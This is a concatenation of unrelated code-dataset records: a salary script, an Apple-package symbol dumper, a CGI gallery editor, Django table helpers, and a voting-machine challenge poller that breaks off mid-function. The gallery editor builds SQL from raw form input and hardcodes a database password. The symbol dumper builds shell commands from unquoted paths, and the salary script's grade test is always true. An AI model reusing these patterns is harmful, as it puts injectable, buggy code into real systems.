\n da = 50/100*salary\n pf = 11/100*salary\n \n\n if grade is 'A' or'a':\n allow = 1700\n elif grade is 'B' or'b':\n allow = 1500\n else: \n allow = 1300\n\n totalSalary = (float(salary + hra + da + allow - pf))\n # totalSalary = round(int(totalSalary1))\n # return totalSalary\n print(\"Total salary is: {}\" .format(totalSalary))\n roundSalary = (int(round(totalSalary)))\n\n print(\"Basic Salary of Employee is: {} Grade of Allownce is: {} and total salary is Rs. {} and round-off salary is {}\".format(salary, grade, totalSalary,roundSalary))\n\n\nsalary = float(input(\"Enter Salary: \"))\ngrade = str(input(\"Allownce grade is: \").capitalize())\n\nperson(salary, grade)\n","sub_path":"assignment/employee_salary.py","file_name":"employee_salary.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183490483","text":"#!/usr/bin/env python\n# Copyright 2015 Michael R. Miller. See the LICENSE\n# file at the top-level directory of this distribution.\n'''\nPackageSymbolDumper.py\n\nDumps Breakpad symbols for the contents of an Apple update installer. Given a\npath to an Apple update installer as a .dmg or a path to a specific package\nwithin the disk image, PackageSymbolDumper mounts, traverses, and dumps symbols\nfor all applicable frameworks and dylibs found within.\n\nRequired tools for Linux:\n pax\n gzip\n tar\n xar (http://code.google.com/p/xar/)\n xpwn's dmg (https://github.com/planetbeing/xpwn)\n\nCreated on Apr 11, 2012\n\n@author: mrmiller\n'''\nimport argparse\nimport concurrent.futures\nimport errno\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nfrom scrapesymbols.gathersymbols import process_paths\n\ndef mount_dmg(dmg_extractor, path, mount_point):\n '''\n Mount a disk image at a given mount point.\n\n @param path: a path to the disk image file (.dmg)\n @param mount_point: path at which the image should be mounted\n\n @raise subprocess.CalledProcessError if there is an error mounting\n '''\n if sys.platform == 'darwin':\n subprocess.check_call(['hdiutil', 'attach', path, '-nobrowse', '-mountpoint', mount_point, '-plist'])\n else:\n with tempfile.NamedTemporaryFile() as f:\n subprocess.check_call([dmg_extractor, 'extract', path, f.name])\n subprocess.check_call(['mount', '-o', 'loop', f.name, mount_point])\n\ndef unmount_dmg(mount_point):\n '''\n Unmount a mounted disk image given its mount point.\n\n @param mount_point: path where the image is mounted, e.g. \"/Volumes/test\"\n\n @raise subprocess.CalledProcessError if there is an error unmounting\n '''\n if sys.platform == 'darwin':\n subprocess.check_call(['hdiutil', 'detach', mount_point])\n else:\n subprocess.check_call(['umount', mount_point])\n\ndef expand_pkg(pkg_path, out_path):\n '''\n Expands the contents of an installer package to some directory.\n\n @param pkg_path: a path to an installer package (.pkg)\n @param out_path: a path to hold the package contents\n '''\n subprocess.check_call('cd \"{dest}\" && xar -x -f \"{src}\"'.format(src=pkg_path, dest=out_path), shell=True)\n\ndef filter_files(function, path):\n '''\n Yield file paths matching a filter function by walking the\n hierarchy rooted at path.\n\n @param function: a function taking in a filename that returns true to\n include the path\n @param path: the root path of the hierarchy to traverse\n '''\n for root, _dirs, files in os.walk(path):\n for filename in files:\n if function(filename):\n yield os.path.join(root, filename)\n\ndef find_packages(path):\n '''\n Returns a list of installer packages (as determined by the .pkg extension)\n found within path.\n\n @param path: root path to search for .pkg files\n '''\n return filter_files(lambda filename:\n os.path.splitext(filename)[1] == '.pkg',\n path)\n\ndef find_all_packages(paths):\n '''\n Yield installer package files found in all of `paths`.\n\n @param path: list of root paths to search for .pkg files\n '''\n for path in paths:\n for pkg in find_packages(path):\n yield pkg\n\ndef find_payloads(path):\n '''\n Returns a list of possible installer package payload paths.\n\n @param path: root path for an installer package\n '''\n return filter_files(lambda filename:\n 'Payload' in filename or '.pax.gz' in filename,\n path)\n\ndef extract_payload(payload_path, output_path):\n '''\n Extracts the contents of an installer package payload to a given directory.\n\n @param payload_path: path to an installer package's payload\n @param output_path: output path for the payload's contents\n @return True for success, False for failure.\n '''\n header = open(payload_path, 'rb').read(2)\n if header == 'BZ':\n extract = 'bzip2'\n elif header == '\\x1f\\x8b':\n extract = 'gzip'\n else:\n # Unsupported format\n logging.error('Unknown payload format: 0x{0:x}{1:x}'.format(ord(header[0]), ord(header[1])))\n return False\n try:\n # XXX: This sucks because if the extraction fails pax will hang with\n # a prompt instead of just failing.\n subprocess.check_call('cd {dest} && {extract} -dc {payload} | pax -r -k -s \":^/::\"'.format(extract=extract, payload=payload_path, dest=output_path), shell=True)\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef shutil_error_handler(caller, path, excinfo):\n logging.error('Could not remove \"{path}\": {info}'.format(path=path, info=excinfo))\n\n\ndef write_symbol_file(dest, filename, contents):\n full_path = os.path.join(dest, filename)\n try:\n os.makedirs(os.path.dirname(full_path))\n open(full_path, 'wb').write(contents)\n except os.error as e:\n if e.errno != errno.EEXIST:\n raise\n\ndef dump_symbols_from_payload(executor, dump_syms, payload_path, dest):\n '''\n Dumps all the symbols found inside the payload of an installer package.\n\n @param dump_syms: path to the dump_syms executable\n @param payload_path: path to an installer package's payload\n @param dest: output path for symbols\n '''\n temp_dir = None\n logging.info('Dumping symbols from payload: ' + payload_path)\n try:\n temp_dir = tempfile.mkdtemp()\n logging.info('Extracting payload to {path}.'.format(path=temp_dir))\n if not extract_payload(payload_path, temp_dir):\n logging.error('Could not extract payload: ' + payload_path)\n return\n\n # dump the symbols for the payload contents\n system_library = os.path.join('System', 'Library')\n subdirectories = [os.path.join(system_library, 'Frameworks'), os.path.join(system_library, 'PrivateFrameworks'), os.path.join('usr', 'lib')]\n paths_to_dump = map(lambda d: os.path.join(temp_dir, d), subdirectories)\n\n for filename, contents in process_paths(paths_to_dump, executor, dump_syms, False, platform='darwin'):\n if filename and contents:\n write_symbol_file(dest, filename, contents)\n\n finally:\n if temp_dir is not None:\n shutil.rmtree(temp_dir, onerror=shutil_error_handler)\n\ndef dump_symbols_from_package(executor, dump_syms, pkg, dest):\n '''\n Dumps all the symbols found inside an installer package.\n\n @param dump_syms: path to the dump_syms executable\n @param pkg: path to an installer package\n @param dest: output path for symbols\n '''\n temp_dir = None\n logging.info('Dumping symbols from package: ' + pkg)\n try:\n temp_dir = tempfile.mkdtemp()\n expand_pkg(pkg, temp_dir)\n\n # check for any subpackages\n for subpackage in find_packages(temp_dir):\n logging.warning('UNTESTED: Found subpackage at: ' + subpackage)\n dump_symbols_from_package(executor, dump_syms, subpackage, dest)\n\n # dump symbols from any payloads (only expecting one) in the package\n for payload in find_payloads(temp_dir):\n dump_symbols_from_payload(executor, dump_syms, payload, dest)\n\n finally:\n if temp_dir is not None:\n shutil.rmtree(temp_dir, onerror=shutil_error_handler)\n\n\ndef read_processed_packages(tracking_file):\n if tracking_file is None or not os.path.exists(tracking_file):\n return set()\n\n return set(open(tracking_file, 'rb').read().splitlines())\n\n\ndef write_processed_packages(tracking_file, processed_packages):\n if tracking_file is None:\n return\n\n open(tracking_file, 'wb').write('\\n'.join(processed_packages))\n\n\ndef main(args):\n if not args.search or not all(os.path.exists(p) for p in args.search):\n logging.error('Invalid search path')\n return\n if not os.path.exists(args.to):\n logging.error('Invalid path to destination')\n return\n\n processed_packages = read_processed_packages(args.tracking_file)\n executor = concurrent.futures.ProcessPoolExecutor()\n for pkg in find_all_packages(args.search):\n if pkg not in processed_packages:\n dump_symbols_from_package(executor, args.dump_syms, pkg, args.to)\n processed_packages.add(pkg)\n write_processed_packages(args.tracking_file, processed_packages)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Extracts Breakpad symbols from a Mac OS X support update.')\n parser.add_argument('--dmg', default='dmg', type=str,\n help='path to the xpwn dmg extractor, ' +\n 'if running on Linux')\n parser.add_argument('--dump_syms', default='dump_syms', type=str,\n help='path to the Breakpad dump_syms executable')\n parser.add_argument('--tracking-file', type=str,\n help='Path to a file in which to store information ' +\n 'about already-processed packages')\n parser.add_argument('search', nargs='+',\n help='Paths to search recursively for packages')\n parser.add_argument('to', type=str, help='destination path for the symbols')\n args = parser.parse_args()\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n main(args)\n","sub_path":"PackageSymbolDumper.py","file_name":"PackageSymbolDumper.py","file_ext":"py","file_size_in_byte":9397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154041855","text":"import cgi\nimport pymysql\nimport cgitb\ncgitb.enable()\ndb = pymysql.connect(host = 'localhost',\n\t\t\t\t\tuser = 'gallery',\n\t\t\t\t \tpasswd = 'eecs118',\n\t\t\t\t\tdb = 'gallery',\n\t\t\t\t\tautocommit = True)\nform = cgi.FieldStorage()\ncur = db.cursor()\nprint(\"Content-Type: text/html\")\nprint()\n\nid = form.getvalue(\"galleryvalue\")\n\nprint(\"\"\"\n\t
    \n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t
    \n\t\t
    \n\t
    \n\t\"\"\")\n\nif form.getvalue(\"new_g_name\") is not None:\n\tcur.execute(\"UPDATE gallery SET name=\\\"{0}\\\" WHERE gallery_id={1}\".format(form.getvalue(\"new_g_name\"),int(id)))\n\tdb.commit()\nif form.getvalue(\"new_g_desc\") is not None:\n\tcur.execute(\"UPDATE gallery SET description=\\\"{0}\\\" WHERE gallery_id={1}\".format(form.getvalue(\"new_g_desc\"),int(id)))\n\tdb.commit()\n\nprint(\"
    \")","sub_path":"EECS 118/mp3/editgallery.py","file_name":"editgallery.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"579986066","text":"import uuid\n\nfrom django.http import HttpRequest\nfrom django.template.loader import render_to_string\nfrom django_tables2 import tables, RequestConfig\nfrom django.utils.translation import gettext_lazy as _\n\nfrom MrMap.columns import MrMapColumn\nfrom MrMap.consts import DJANGO_TABLES2_BOOTSTRAP4_CUSTOM_TEMPLATE\nfrom MrMap.settings import PAGE_SIZE_OPTIONS, PAGE_SIZE_MAX, PAGE_SIZE_DEFAULT, PAGE_DEFAULT\nfrom structure.permissionEnums import PermissionEnum\nfrom users.helper import user_helper\n\n\nclass MrMapTable(tables.Table):\n filter_set = None\n pagination = {}\n page_field = None\n caption = \"\"\n\n def __init__(self,\n request=None,\n filter_set_class=None,\n queryset=None,\n query_filter=None,\n query_class=None,\n current_view=None,\n param_lead='mr-map-t',\n *args,\n **kwargs):\n # Generate a random id for html template\n self.table_id = str(uuid.uuid4())\n self.request = request\n self.filter_set_class = filter_set_class\n self.queryset = queryset\n self.user = user_helper.get_user(request)\n self.current_view = current_view\n self.param_lead = param_lead\n\n self.permission_lookup = {}\n\n # He we set the data kw dynamic by the query_class and query_filter,\n # so we don't need to set the data kw in every view again and again\n # ToDo: it's a little bit messy... refactor this if/else\n if queryset is not None:\n if filter_set_class:\n self._configure_filter_set()\n kwargs['data'] = self.filter_set.qs\n else:\n kwargs['data'] = queryset\n elif query_class:\n if query_filter:\n if filter_set_class:\n self._configure_filter_set(queryset=query_class.objects.filter(query_filter))\n kwargs['data'] = self.filter_set.qs\n else:\n data = query_class.objects.filter(query_filter)\n else:\n if filter_set_class:\n self._configure_filter_set(queryset=query_class.objects.all())\n kwargs['data'] = self.filter_set.qs\n else:\n data = query_class.objects.all()\n kwargs['data'] = data\n\n super(MrMapTable, self).__init__(template_name=DJANGO_TABLES2_BOOTSTRAP4_CUSTOM_TEMPLATE, *args, **kwargs)\n self._configure_pagination()\n\n def _configure_filter_set(self, queryset=None):\n self.filter_set = self.filter_set_class(\n data=self.request.GET,\n queryset=queryset or self.queryset,\n request=self.request,\n )\n\n def _configure_pagination(self):\n RequestConfig(self.request).configure(self)\n self.prepare_table_pagination_settings(self.request, self.param_lead)\n self.page_field = self.pagination.get('page_name')\n self.paginate(page=self.request.GET.get(self.pagination.get('page_name'), PAGE_DEFAULT),\n per_page=self.request.GET.get(self.pagination.get('page_size_param'), PAGE_SIZE_DEFAULT))\n\n def check_render_permission(self, permission: PermissionEnum):\n has_perm = self.permission_lookup.get(permission, None)\n if has_perm is None:\n has_perm = self.user.has_perm(perm=permission)\n self.permission_lookup[permission] = has_perm\n return has_perm\n\n\n def prepare_table_pagination_settings(self, request: HttpRequest, param_lead: str):\n return self.prepare_list_pagination_settings(request, param_lead)\n\n def prepare_list_pagination_settings(self, request: HttpRequest, param_lead: str):\n len_rows = len(self.rows)\n page_size_options = list(filter(lambda item: item <= len_rows, PAGE_SIZE_OPTIONS))\n\n if len_rows not in page_size_options:\n page_size_options.append(len_rows)\n\n page_size_options = list(filter(lambda item: item <= PAGE_SIZE_MAX, page_size_options))\n\n self.pagination = {'page_size_param': param_lead + '-size',\n 'page_size_options': page_size_options,\n 'page_name': param_lead + '-page'\n }\n\n if PAGE_SIZE_DEFAULT <= page_size_options[-1]:\n page_size = PAGE_SIZE_DEFAULT\n else:\n page_size = page_size_options[-1]\n\n self.pagination.update({'page_size': request.GET.get(self.pagination.get('page_size_param'), page_size)})\n\n\nclass ActionTableMixin(tables.Table):\n actions = MrMapColumn(\n verbose_name=_('Actions'),\n tooltip=_('Actions you can perform'),\n empty_values=[],\n orderable=False,\n attrs={\"td\": {\"class\": \"text-right\",\n \"style\": \"white-space:nowrap; width: auto !important;\"},\n \"th\": {\"style\": \"width: 1px;\"}\n }\n )\n\n\n","sub_path":"mrmap/MrMap/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115367123","text":"#!/usr/bin/env python\n#\n# Copyright (C) 2014 Narf Industries \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n\nfrom generator.actions import Actions, Variable\nfrom random import choice, randint\nfrom os.path import dirname, abspath, join\nimport sys\nimport struct\n\n\nsys.path.append(join(dirname(dirname(dirname(abspath(__file__)))), \"support\"))\nimport support as sp\nfrom common import DEBUG, CONFIG\nfrom election import Election, ElectionManager, Voter, Candidate, Vote\n\nclass VotingMachine(Actions):\n\n ELECTION_NAME = \"Enter election name: \"\n ELECTION_CREATED = \"Election Created.\\n\"\n ELECTION_OPEN = \"Voting Open.\\n\"\n ELECTION_CLOSED = \"Voting Closed.\\n\"\n CREATE_E_MGR = \"## Create election manager ##\\n\"\n CREATE_VOTER = \"## Create voter ##\\n\"\n CREATE_CANDIDATE = \"## Create candidate ##\\n\"\n CANDIDATE_ADDED = \"Candidate Added.\\n\"\n CANDIDATE_INVALID = \"New candidate invalid\\n\"\n\n ZERO_CANDIDATES = \"\\tThere were zero candidates.\\n\"\n CANDIDATE_ORDER = \"\\t| Rank | Votes | Candidate Name |\\n\"\n ZERO_VOTERS = \"\\tThere were zero voters.\\n\"\n VOTER_ORDER = \"\\t| Voted? | Voter Name |\\n\"\n\n VOTING_RESULTS = \"## Voting Results ##\\n\"\n CANDIDATE_SUMMARY = \"## Candidate Summary ##\\n\"\n VOTER_TURNOUT = \"## Voter Turnout ##\\n\"\n\n SELECT_CANDIDATE = \"Select one candidate from the folloowing:\\n\"\n EMPTY_CANDIDATES = \"There are no candidates. Go add some.\\n\"\n FULL_CANDIDATES = \"Not accepting additional candidates.\\n\"\n INVALID_CANDIDATE = \"Invalid candidate. Try again.\\n\"\n\n F_NAME = \"\\tEnter first name: \"\n L_NAME = \"\\tEnter last name: \"\n\n ENTER_ID = \"\\tEnter your ID number: \"\n ENTER_AUTH_KEY = \"\\tEnter auth key: \"\n NEW_AUTH_KEY = \"\\tYour auth key is: \"\n NEW_UID = \"\\tYour ID number is: \"\n\n NUM_WINNERS_Q = \"Enter number of election winners desired: \"\n MAX_CANDIDATES_Q = \"Enter the max number of candidates allowed: \"\n WRITE_IN_OK_Q = \"Can voters write-in new candidates? (Yy/Nn): \"\n\n CHOOSE = \"Choose an option: \"\n\n MENU_LOGIN = \"14: Login\\n\"\n MENU_MAIN = \"15: Main Menu\\n\"\n MENU_CREATE_ELECTION = \"17: Create Election\\n\"\n MENU_OPEN_VOTING = \"18. Open Voting\\n\"\n MENU_CLOSE_VOTING = \"20. Close Voting\\n\"\n MENU_ELECTION_STATUS = \"22. Election Status\\n\"\n\n MENU_REGISTER_VOTER = \"38. Register Voter\\n\"\n MENU_VOTE = \"36. Vote\\n\"\n MENU_ADD_CANDIDATE = \"54. Add Candidate\\n\"\n MENU_VOTING_RESULTS = \"56. Voting Results\\n\"\n MENU_VOTER_TURNOUT = \"72. Voter Turnout\\n\"\n MENU_CANDIDATE_SUMMARY = \"88. Candidate Summary\\n\"\n\n MENU_QUIT = \"95. Quit\\n\"\n\n FAIL = \"Is voting too hard?!\\n\"\n\n MENU_ENTRIES = {\n 0x0E: MENU_LOGIN,\n 0x0F: MENU_MAIN,\n\n 0x11: MENU_CREATE_ELECTION,\n 0x12: MENU_OPEN_VOTING,\n 0x14: MENU_CLOSE_VOTING,\n 0x16: MENU_ELECTION_STATUS,\n\n 0x24: MENU_VOTE,\n 0x26: MENU_REGISTER_VOTER,\n\n 0x36: MENU_ADD_CANDIDATE,\n\n 0x38: MENU_VOTING_RESULTS,\n 0x48: MENU_VOTER_TURNOUT,\n 0x58: MENU_CANDIDATE_SUMMARY,\n\n 0x5F: MENU_QUIT,\n }\n\n def _receive_by_len(self, a_str, delim='', term=''):\n line = \"{0}{1}{2}\".format(a_str, delim, term)\n self.read(length=len(line), expect=line)\n\n def _receive_by_delim(self, delim=''):\n self.read(delim=delim)\n\n def _send_str(self, cmd):\n self.write(sp.pack_single_string(\"{0}{1}\".format(cmd, CONFIG['DELIM'])))\n\n def _receive_prompt_send_answer(self, prompt, answer):\n self._receive_by_len(prompt, term=CONFIG['TERM'])\n self._send_str(answer)\n\n # def _recv_name(self, name):\n # # recv NNAME prompt\n # self._recv_string(self.NNAME)\n # # recv name\n # self._recv_string(name)\n\n def _send_first_last_name(self, f_name, l_name):\n self._receive_prompt_send_answer(self.F_NAME, f_name)\n self._receive_prompt_send_answer(self.L_NAME, l_name)\n\n\n # def _recv_string(self, aStr):\n # self.read(delim=CONFIG['TERM'], expect=sp.pack_single_string(aStr))\n\n # def _recv_conf_num(self):\n # self.read(length=8, expect=sp.pack_single_uint64(self._get_next_conf_num()))\n\n # def _recv_next_tid(self, citizen=None):\n # if citizen is not None:\n # s = self.magic_page[ord(citizen.name[0])]\n # s += self.magic_page[ord(citizen.name[1])]\n # s += self.magic_page[ord(citizen.name[2])]\n # s += self.magic_page[ord(citizen.name[3])]\n # if DEBUG:\n # print \"tid:{0}{1}{2}{3}\".format(hex(ord(s[0]))[2:], hex(ord(s[1]))[2:], hex(ord(s[2]))[2:], hex(ord(s[3]))[2:])\n # # self.read(length=4, expect=sp.pack_single_string(s))\n # self.read(length=4, expect=sp.pack_single_string(s), assign=self.state['tid'])\n # else:\n # self.read(length=4, expect=r'(.*)', expect_format='pcre')\n\n # def _get_next_conf_num(self):\n # self.state['cn'] += 1\n # return self.state['cn'] - 1\n\n def _is_menu_id_valid_op(self, menu_id):\n creds = False\n op = 0 != (menu_id & self.state['e'].state)\n\n if 0x0E == menu_id:\n creds = (False == self.state['e'].have_authd_user())\n elif 0x0F == menu_id:\n creds = (True == self.state['e'].have_authd_user())\n\n elif 0x11 == menu_id:\n creds = (False == self.state['e'].have_authd_user())\n elif 0x12 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n elif 0x14 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n elif 0x16 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n\n elif 0x24 == menu_id:\n creds = (True == self.state['e'].have_authd_voter())\n elif 0x26 == menu_id:\n creds = (False == self.state['e'].have_authd_user())\n\n elif 0x36 == menu_id:\n creds = (((True == self.state['e'].have_authd_e_mgr()) or \\\n ((True == self.state['e'].have_authd_user()) and (1 == self.state['e'].write_in_ok))) and \\\n (self.state['e'].get_candidate_count() < self.state['e'].max_candidates))\n\n elif 0x38 == menu_id:\n creds = (True == self.state['e'].have_authd_user())\n elif 0x48 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n elif 0x58 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n else:\n creds = False\n\n return op and creds\n\n def _receive_fail(self):\n self._receive_by_len(self.FAIL, term=CONFIG['TERM'])\n\n def _process_menu(self):\n '''\n Receive the relevant lines in the menu.\n\n # login_menu\n # admin_menu\n # voting_menu\n # results_menu\n # quit entry\n '''\n cmds = self.MENU_ENTRIES.keys()\n cmds.sort()\n menu = ''\n for m_id in cmds:\n if True == self._is_menu_id_valid_op(m_id):\n menu += self.MENU_ENTRIES[m_id] + CONFIG['TERM']\n\n menu += self.MENU_QUIT + CONFIG['TERM']\n self._receive_by_len(menu)\n\n self._receive_by_len(self.CHOOSE, term=CONFIG['TERM'])\n\n def _back_to_main_menu(self):\n '''\n Option to go from sub_menu back to main_menu.\n '''\n self._process_menu()\n\n cmd = 0x0F\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _create_election(self):\n '''\n Create the election manager profile and setup the election parameters\n '''\n self._process_menu()\n\n self.state['e'].authd_user = None\n\n cmd = 0x11\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n\n # create election mgr\n self._receive_by_len(self.CREATE_E_MGR, term=CONFIG['TERM'])\n mgr = self.state['e'].make_random_e_mgr()\n self._send_first_last_name(mgr.f_name, mgr.l_name)\n self._receive_by_len(self.NEW_UID)\n self._receive_by_len(mgr.id, delim=CONFIG['DELIM'])\n self._receive_by_len(self.NEW_AUTH_KEY)\n auth_key = Variable('authkey')\n auth_key.set_slice(0)\n self.read(delim=CONFIG['DELIM'], assign=auth_key)\n self.state['e'].set_e_mgr_auth_key(auth_key)\n\n # send election name\n self._receive_prompt_send_answer(self.ELECTION_NAME, self.state['e'].name)\n\n # set election conf\n num_winners = randint(1, 4)\n max_candidates = randint(5, 20)\n write_in_ok = choice(['Y', 'N'])\n self._receive_prompt_send_answer(self.NUM_WINNERS_Q, num_winners)\n self._receive_prompt_send_answer(self.MAX_CANDIDATES_Q, max_candidates)\n self._receive_prompt_send_answer(self.WRITE_IN_OK_Q, write_in_ok)\n\n self.state['e'].num_winners = num_winners\n self.state['e'].max_candidates = max_candidates\n self.state['e'].write_in_ok = 1 if 'Y' == write_in_ok else 0\n self.state['e'].is_configured = True\n\n # set state to NEW\n self.state['e'].set_state('NEW')\n\n # recv ELECTION_CREATED\n self._receive_by_len(self.ELECTION_CREATED, term=CONFIG['TERM'])\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _register_voter(self):\n '''\n Register a new voter\n '''\n self._process_menu()\n cmd = 0x26\n self._send_str(cmd)\n self.state['e'].authd_user = None\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.CREATE_VOTER, term=CONFIG['TERM'])\n\n voter = self.state['e'].make_random_voter()\n # send voter's first and last name\n self._send_first_last_name(voter.f_name, voter.l_name)\n\n # receive \"NEW_UID\" msg and voter's ID\n self._receive_by_len(self.NEW_UID)\n self._receive_by_len(voter.id, delim=CONFIG['DELIM'])\n\n self.state['e'].add_voter(voter)\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _login(self, who=\"VOTER\"):\n '''\n Login either a voter or the election manager, or cause login error\n '''\n self._process_menu()\n cmd = 0x0E\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].authd_user = None\n user = None\n if who is \"ERROR\":\n user = self.state['e'].make_random_voter(is_valid=False)\n elif who is \"E_MGR\":\n user = self.state['e'].e_mgr\n elif who is \"VOTER\":\n user = self.state['e'].get_random_voter()\n if user is None:\n who = \"ERROR\"\n user = self.state['e'].make_random_voter(is_valid=False)\n\n # send creds\n self._receive_prompt_send_answer(self.ENTER_ID, user.id)\n self._receive_prompt_send_answer(self.L_NAME, user.l_name)\n\n if who is \"E_MGR\":\n self._receive_by_len(self.ENTER_AUTH_KEY, term=CONFIG['TERM'])\n self.write(user.auth_key) # auth_key is a Variable()\n\n if who is \"ERROR\":\n self._receive_fail()\n return -1\n else:\n self.state['e'].authd_user = user\n\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _open_voting(self):\n '''\n Set voting to OPEN state\n '''\n self._process_menu()\n cmd = 0x12\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].set_state('OPEN')\n self._receive_by_len(self.ELECTION_OPEN, term=CONFIG['TERM'])\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _close_voting(self):\n '''\n Set voting to CLOSED state\n '''\n self._process_menu()\n cmd = 0x14\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].set_state('CLOSED')\n self._receive_by_len(self.ELECTION_CLOSED, term=CONFIG['TERM'])\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n\n def _election_status(self):\n '''\n Get the status of the election.\n '''\n self._process_menu()\n cmd = 0x16\n self._send_str(cmd)\n\n fmt = \"\\tNumber of voters: {0}\\n\\tNumber of votes: {1}\\n\\tNumber of candidates: {2}\\n\"\n\n if True == self._is_menu_id_valid_op(cmd):\n msg = fmt.format(self.state['e'].get_voter_count(),\n self.state['e'].get_vote_count(),\n self.state['e'].get_candidate_count())\n self._receive_by_len(msg)\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _add_candidate(self):\n '''\n Add a new candidate for the election.\n '''\n self._process_menu()\n cmd = 0x36\n self._send_str(cmd)\n\n\n if True == self._is_menu_id_valid_op(cmd):\n\n if self.state['e'].get_candidate_count() >= self.state['e'].max_candidates:\n self._receive_by_len(self.FULL_CANDIDATES, term=CONFIG['TERM'])\n else:\n self._receive_by_len(self.CREATE_CANDIDATE, term=CONFIG['TERM'])\n\n candidate = self.state['e'].make_random_candidate()\n # send first and last name\n self._send_first_last_name(candidate.f_name, candidate.l_name)\n\n if False:\n self._receive_by_len(self.CANDIDATE_INVALID, term=CONFIG['TERM'])\n\n self._receive_by_len(self.CANDIDATE_ADDED, term=CONFIG['TERM'])\n self.state['e'].add_candidate(candidate)\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _vote(self):\n '''\n Place a vote.\n '''\n self._process_menu()\n cmd = 0x24\n self._send_str(cmd)\n\n\n if True == self._is_menu_id_valid_op(cmd):\n\n # check to see if there are any candidates to vote for\n if 0 == self.state['e'].get_candidate_count():\n self._receive_by_len(self.EMPTY_CANDIDATES, term=CONFIG['TERM'])\n else:\n # read candidate list\n self._receive_by_len(self.SELECT_CANDIDATE, term=CONFIG['TERM'])\n fmt = \"\\t{0}: {1} {2}\\n\"\n for c in self.state['e'].candidates:\n line = fmt.format(c.id, c.f_name, c.l_name)\n self._receive_by_len(line)\n\n self._receive_by_len(self.CHOOSE, term=CONFIG['TERM'])\n\n # make selection\n c = self.state['e'].get_random_candidate()\n self._send_str(c.id)\n\n # receive voting receipt\n p1 = \"Confirmation #\"\n p2 = \" Vote recorded for candidate: {0} {1}.\\n\"\n\n self._receive_by_len(p1)\n\n vote_id = Variable('voteid{0}'.format(self.state['e'].authd_user.id))\n vote_id.set_slice(0)\n self.read(delim='.', assign=vote_id)\n\n self._receive_by_len(p2.format(c.f_name, c.l_name))\n\n # record vote\n v = Vote(vote_id, self.state['e'].authd_user, c)\n self.state['e'].add_vote(v)\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _voting_results(self):\n '''\n Get the voting results\n '''\n self._process_menu()\n cmd = 0x38\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.VOTING_RESULTS, term=CONFIG['TERM'])\n\n # check to see if there were any candidates voted for\n if 0 == self.state['e'].get_candidate_count():\n self._receive_by_len(self.ZERO_CANDIDATES, term=CONFIG['TERM'])\n else:\n # calculate voting results\n v_res = self.state['e'].get_voting_results()\n\n # read candidate list\n self._receive_by_len(self.CANDIDATE_ORDER, term=CONFIG['TERM'])\n fmt = \"\\t{0}.\\t{1}\\t\"\n winners = 0\n for (count, c) in v_res:\n if winners >= self.state['e'].num_winners:\n break\n winners += 1\n line = fmt.format(winners, count)\n self._receive_by_len(line)\n # use a wild card recv for the name portion because python and C code\n # have different results from a sort with multiple equal sort-keys.\n self._receive_by_delim(delim='\\n')\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _voter_turnout(self):\n '''\n Get the voter turnout results\n '''\n self._process_menu()\n cmd = 0x48\n self._send_str(cmd)\n fmt = \"\\tNumber of voters: {0}\\n\\tNumber of votes: {1}\\n\";\n\n if True == 